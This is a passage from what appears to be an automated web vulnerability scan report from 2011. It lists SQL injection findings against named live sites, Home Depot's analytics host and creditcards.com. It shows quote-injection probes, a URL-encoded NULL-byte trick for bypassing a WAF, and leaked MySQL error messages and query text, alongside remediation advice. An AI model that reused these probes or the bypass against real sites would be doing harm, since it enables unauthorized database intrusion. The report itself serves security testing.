GET /b/ss/homedepot/1/H.22.1%00'/s23837734712508?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A8%3A3%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s23837734712508?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A8%3A3%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Omniture DC/2.0.0
xserver: www287
Content-Length: 0
Content-Type: text/html


1.57. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s24903706079207 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s24903706079207

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s24903706079207%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A1%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:46:55 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s24903706079207 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s24903706079207%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A1%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:46:55 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html


1.58. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s26866058967834 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s26866058967834

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s26866058967834%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A3%3A34%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:54:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s26866058967834 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s26866058967834%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A3%3A34%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:54:25 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.59. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s28965976873370 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s28965976873370

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s28965976873370%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A7%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:13:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s28965976873370 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s28965976873370%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A7%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:13:36 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.60. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s29808383558389 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s29808383558389

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/homedepot/1/H.22.1/s29808383558389?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A0%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:42:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s29808383558389 was not fou
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s29808383558389?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A0%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:42:01 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html


1.61. http://www.creditcards.com/oc/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?pid=22145581'&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:37 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3613
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:37 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22145581''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '22145581''; File: /usr/local/apach
...[SNIP]...

Request 2

GET /oc/?pid=22145581''&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:38 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705403888336438&data3=0&sid=1889&c=22145581%27%27
Vary: Accept-Encoding
Content-Length: 2765
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:38 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.62. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc//%2522ns%253D%2522netsparker%25280x000132%2529)

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:52 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3554
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:52 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:52 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475299761114&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:52 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.63. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc/Netsparker8d82b62392124f8783667c0217ea8f35/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:48 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3592
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:48 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:49 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705474953559178&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:49 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.64. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:50 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3554
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:50 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:50 GMT
Server: Apache
